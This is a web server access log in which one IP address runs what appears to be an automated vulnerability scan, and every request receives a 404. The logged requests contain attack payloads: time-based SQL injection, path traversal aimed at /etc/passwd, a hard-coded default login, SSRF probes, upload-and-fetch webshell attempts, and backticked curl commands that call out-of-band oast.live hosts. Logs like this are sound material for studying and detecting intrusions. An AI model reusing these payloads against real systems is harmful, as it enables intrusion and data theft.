137.220.197.141 - - [21/Jan/2024:19:37:11 +0100] "GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:37:38 +0100] "GET /wp-json/wp/v2/lesson/1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:37:48 +0100] "GET /wp-json/wp/v2/lesson/1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:37:58 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:37:58 +0100] "GET /wp-json/wp/v2/lesson/1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:38:15 +0100] "GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:38:39 +0100] "POST /login.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:38:46 +0100] "GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:39:06 +0100] "POST /cgi-bin/system_mgr.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:39:08 +0100] "POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:39:19 +0100] "GET /Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:39:33 +0100] "POST /cgi-bin/system_mgr.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:39:35 +0100] "POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:40:00 +0100] "POST /login.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:40:08 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:40:11 +0100] "POST /login.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:40:22 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:40:23 +0100] "POST /login.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:40:29 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:40:39 +0100] "GET /Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:40:46 +0100] "GET /wp-json/wp/v2/lesson/1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:40:49 +0100] "GET /Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:41:02 +0100] "GET /Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:41:22 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:41:31 +0100] "GET /wp-json/wp/v2/lesson/1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:41:47 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:41:54 +0100] "GET /wp-json/wp/v2/lesson/1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:43:20 +0100] "POST /login.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:43:52 +0100] "GET /Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:44:04 +0100] "POST /login.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:44:26 +0100] "POST /login.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:44:34 +0100] "GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:44:37 +0100] "GET /Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:44:59 +0100] "GET /Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:45:29 +0100] "GET /wp-json/wp/v2/lesson/1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:45:59 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:47:22 +0100] "GET /wp-json/wp/v2/lesson/1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:47:26 +0100] "GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:47:35 +0100] "GET /wp-json/wp/v2/lesson/1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:47:44 +0100] "GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:48:05 +0100] "POST /login.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:48:10 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:48:14 +0100] "GET /manage/fileDownloader?sec=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:48:14 +0100] "GET /index.php?page&action=edit&f1=.//./\.//./\.//./\.//./\.//./\.//./etc/passwd&restore=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:48:24 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:48:33 +0100] "GET /Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:49:36 +0100] "GET /manage/fileDownloader?sec=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:49:46 +0100] "GET /manage/fileDownloader?sec=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:49:53 +0100] "GET /index.php?page&action=edit&f1=.//./\.//./\.//./\.//./\.//./\.//./etc/passwd&restore=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:49:58 +0100] "GET /manage/fileDownloader?sec=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:50:04 +0100] "POST /login.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:50:04 +0100] "GET /index.php?page&action=edit&f1=.//./\.//./\.//./\.//./\.//./\.//./etc/passwd&restore=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:50:17 +0100] "POST /login.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:50:17 +0100] "GET /index.php?page&action=edit&f1=.//./\.//./\.//./\.//./\.//./\.//./etc/passwd&restore=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:50:32 +0100] "GET /Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:50:45 +0100] "GET /Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:52:52 +0100] "GET /manage/fileDownloader?sec=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:53:39 +0100] "GET /manage/fileDownloader?sec=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:53:50 +0100] "GET /index.php?page&action=edit&f1=.//./\.//./\.//./\.//./\.//./\.//./etc/passwd&restore=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:54:01 +0100] "GET /manage/fileDownloader?sec=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:54:46 +0100] "GET /index.php?page&action=edit&f1=.//./\.//./\.//./\.//./\.//./\.//./etc/passwd&restore=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:55:11 +0100] "GET /index.php?page&action=edit&f1=.//./\.//./\.//./\.//./\.//./\.//./etc/passwd&restore=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:56:33 +0100] "GET /pme/media/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:57:42 +0100] "GET /manage/fileDownloader?sec=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:57:56 +0100] "GET /pme/media/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:58:06 +0100] "GET /pme/media/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:58:19 +0100] "GET /pme/media/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:59:32 +0100] "GET /index.php?page&action=edit&f1=.//./\.//./\.//./\.//./\.//./\.//./etc/passwd&restore=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:59:39 +0100] "GET /manage/fileDownloader?sec=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:59:52 +0100] "GET /manage/fileDownloader?sec=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:00:26 +0100] "GET /index.php?download=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:01:11 +0100] "GET /pme/media/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:01:46 +0100] "GET /index.php?page&action=edit&f1=.//./\.//./\.//./\.//./\.//./\.//./etc/passwd&restore=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:01:56 +0100] "GET /pme/media/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:02:01 +0100] "GET /index.php?page&action=edit&f1=.//./\.//./\.//./\.//./\.//./\.//./etc/passwd&restore=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:02:04 +0100] "GET /index.php?download=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:02:16 +0100] "GET /index.php?download=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:02:18 +0100] "GET /pme/media/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:02:30 +0100] "GET /index.php?download=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:04:12 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:05:51 +0100] "GET /pme/media/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:05:57 +0100] "GET /index.php?download=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:06:01 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:06:13 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:06:28 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:06:50 +0100] "GET /index.php?download=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:07:13 +0100] "GET /index.php?download=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:07:18 +0100] "GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:07:46 +0100] "GET /pme/media/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:07:59 +0100] "GET /pme/media/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:08:08 +0100] "GET /api/settings/values HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:08:41 +0100] "GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:08:51 +0100] "GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:09:04 +0100] "GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:09:30 +0100] "GET /api/settings/values HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:09:40 +0100] "GET /api/settings/values HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:09:52 +0100] "GET /api/settings/values HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:10:26 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:10:59 +0100] "GET /include/makecvs.php?Event=%60curl+http%3a//cmm00rc3m87t5g88qsog56hdxfhhtzwkb.oast.live+-H+'User-Agent%3a+ayyuuO'%60 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:11:01 +0100] "GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//cmm00rc3m87t5g88qsogn6oqqmy1zm85b.oast.live+-H+'User-Agent%3a+ayyuuO'%60 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:11:22 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:11:29 +0100] "GET /index.php?download=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:11:44 +0100] "GET /index.php?page=/etc/passwd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:11:46 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:11:50 +0100] "GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:12:06 +0100] "POST /assets/php/upload.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:12:08 +0100] "GET /assets/data/usrimg/2beczciygn9del5clhibvesrlzm.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:12:30 +0100] "GET /api/settings/values HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:12:31 +0100] "GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1" 404 952
79.133.57.242 - - [21/Jan/2024:20:12:38 +0100] "GET /.env HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:12:50 +0100] "GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:13:09 +0100] "GET /api/settings/values HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:13:14 +0100] "GET /index.php?page=/etc/passwd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:13:25 +0100] "GET /index.php?page=/etc/passwd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:13:29 +0100] "GET /api/settings/values HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:13:33 +0100] "GET /index.php?download=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:13:37 +0100] "GET /index.php?page=/etc/passwd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:13:46 +0100] "GET /index.php?download=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:13:48 +0100] "GET /include/makecvs.php?Event=%60curl+http%3a//cmm00rc3m87t5g88qsogawajhfwwxpakc.oast.live+-H+'User-Agent%3a+ayyuuO'%60 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:13:50 +0100] "GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//cmm00rc3m87t5g88qsogmxfdkfjbczbr9.oast.live+-H+'User-Agent%3a+ayyuuO'%60 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:14:06 +0100] "GET /include/makecvs.php?Event=%60curl+http%3a//cmm00rc3m87t5g88qsogw7dggaq7uiqga.oast.live+-H+'User-Agent%3a+ayyuuO'%60 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:14:08 +0100] "GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//cmm00rc3m87t5g88qsog8yog3msm88hjo.oast.live+-H+'User-Agent%3a+ayyuuO'%60 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:14:30 +0100] "GET /include/makecvs.php?Event=%60curl+http%3a//cmm00rc3m87t5g88qsogjkmiodoaq18hz.oast.live+-H+'User-Agent%3a+ayyuuO'%60 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:14:32 +0100] "GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//cmm00rc3m87t5g88qsogzqx6w4q6edfpd.oast.live+-H+'User-Agent%3a+ayyuuO'%60 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:14:50 +0100] "POST /assets/php/upload.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:14:52 +0100] "GET /assets/data/usrimg/2beczciygn9del5clhibvesrlzm.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:15:09 +0100] "POST /assets/php/upload.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:15:11 +0100] "GET /assets/data/usrimg/2beczciygn9del5clhibvesrlzm.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:15:33 +0100] "POST /assets/php/upload.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:15:35 +0100] "GET /assets/data/usrimg/2beczciygn9del5clhibvesrlzm.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:16:11 +0100] "GET /dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:16:15 +0100] "GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:16:25 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:16:52 +0100] "GET /api/settings/values HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:16:55 +0100] "GET /index.php?page=/etc/passwd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:17:46 +0100] "GET /dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:17:46 +0100] "GET /index.php?page=/etc/passwd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:17:57 +0100] "GET /dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:18:09 +0100] "GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:18:10 +0100] "GET /dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:18:10 +0100] "GET /index.php?page=/etc/passwd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:18:20 +0100] "GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:18:43 +0100] "GET /api/settings/values HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:18:48 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:18:55 +0100] "GET /api/settings/values HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:19:04 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:20:30 +0100] "GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:20:32 +0100] "GET /ext-js/index.html HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:20:35 +0100] "GET /include/makecvs.php?Event=%60curl+http%3a//cmm00rc3m87t5g88qsogdzuk5r8qma15k.oast.live+-H+'User-Agent%3a+ayyuuO'%60 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:20:37 +0100] "GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//cmm00rc3m87t5g88qsogbd6a5mjw3c61n.oast.live+-H+'User-Agent%3a+ayyuuO'%60 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:20:38 +0100] "POST /incom/modules/uploader/showcase/script.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:20:40 +0100] "GET /upload/userfiles/image/2bECzEqdV1Ux5C5NsGigeLZngrH.png HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:21:35 +0100] "POST /assets/php/upload.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:21:37 +0100] "GET /assets/data/usrimg/2beczciygn9del5clhibvesrlzm.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:21:44 +0100] "GET /dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:22:12 +0100] "GET /include/makecvs.php?Event=%60curl+http%3a//cmm00rc3m87t5g88qsogp5j9f56s3bku7.oast.live+-H+'User-Agent%3a+ayyuuO'%60 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:22:14 +0100] "GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//cmm00rc3m87t5g88qsogpbqunpuksswqr.oast.live+-H+'User-Agent%3a+ayyuuO'%60 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:22:24 +0100] "GET /index.php?page=/etc/passwd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:22:37 +0100] "GET /dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:22:57 +0100] "GET /include/makecvs.php?Event=%60curl+http%3a//cmm00rc3m87t5g88qsogcjqjpnpx3duxo.oast.live+-H+'User-Agent%3a+ayyuuO'%60 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:22:59 +0100] "GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//cmm00rc3m87t5g88qsogztfeoujfxmzq7.oast.live+-H+'User-Agent%3a+ayyuuO'%60 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:23:02 +0100] "GET /dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:23:09 +0100] "POST /assets/php/upload.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:23:11 +0100] "GET /assets/data/usrimg/2beczciygn9del5clhibvesrlzm.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:23:11 +0100] "GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:23:14 +0100] "GET /ext-js/index.html HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:23:18 +0100] "POST /incom/modules/uploader/showcase/script.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:23:20 +0100] "GET /upload/userfiles/image/2bECzEqdV1Ux5C5NsGigeLZngrH.png HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:23:32 +0100] "GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:23:34 +0100] "GET /ext-js/index.html HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:23:38 +0100] "POST /incom/modules/uploader/showcase/script.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:23:40 +0100] "GET /upload/userfiles/image/2bECzEqdV1Ux5C5NsGigeLZngrH.png HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:23:56 +0100] "POST /assets/php/upload.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:23:58 +0100] "GET /assets/data/usrimg/2beczciygn9del5clhibvesrlzm.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:23:58 +0100] "GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:24:00 +0100] "GET /ext-js/index.html HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:24:04 +0100] "POST /incom/modules/uploader/showcase/script.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:24:06 +0100] "GET /upload/userfiles/image/2bECzEqdV1Ux5C5NsGigeLZngrH.png HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:24:35 +0100] "GET /index.php?page=/etc/passwd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:24:49 +0100] "GET /index.php?page=/etc/passwd%00 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:26:57 +0100] "GET /+CSCOE+/session_password.html HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:27:18 +0100] "GET /dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:28:18 +0100] "GET /+CSCOE+/session_password.html HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:28:27 +0100] "GET /+CSCOE+/session_password.html HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:28:38 +0100] "GET /+CSCOE+/session_password.html HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:29:16 +0100] "GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:29:18 +0100] "GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:29:31 +0100] "GET /dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:29:35 +0100] "POST /incom/modules/uploader/showcase/script.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:29:35 +0100] "GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:29:37 +0100] "GET /ext-js/index.html HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:29:37 +0100] "GET /upload/userfiles/image/2bECzEqdV1Ux5C5NsGigeLZngrH.png HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:29:45 +0100] "GET /dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:30:45 +0100] "GET /include/makecvs.php?Event=%60curl+http%3a//cmm00rc3m87t5g88qsogds18jhcgjofuj.oast.live+-H+'User-Agent%3a+ayyuuO'%60 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:30:47 +0100] "GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//cmm00rc3m87t5g88qsogdkjg3st8oqah6.oast.live+-H+'User-Agent%3a+ayyuuO'%60 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:31:03 +0100] "POST /incom/modules/uploader/showcase/script.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:31:03 +0100] "GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:31:05 +0100] "GET /upload/userfiles/image/2bECzEqdV1Ux5C5NsGigeLZngrH.png HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:31:05 +0100] "GET /ext-js/index.html HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:31:09 +0100] "GET /wp-content/plugins/easy-wp-smtp/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:20:31:11 +0100] "GET /wp-content/plugins/wp-mail-smtp-pro/ HTTP/1.1" 404 952
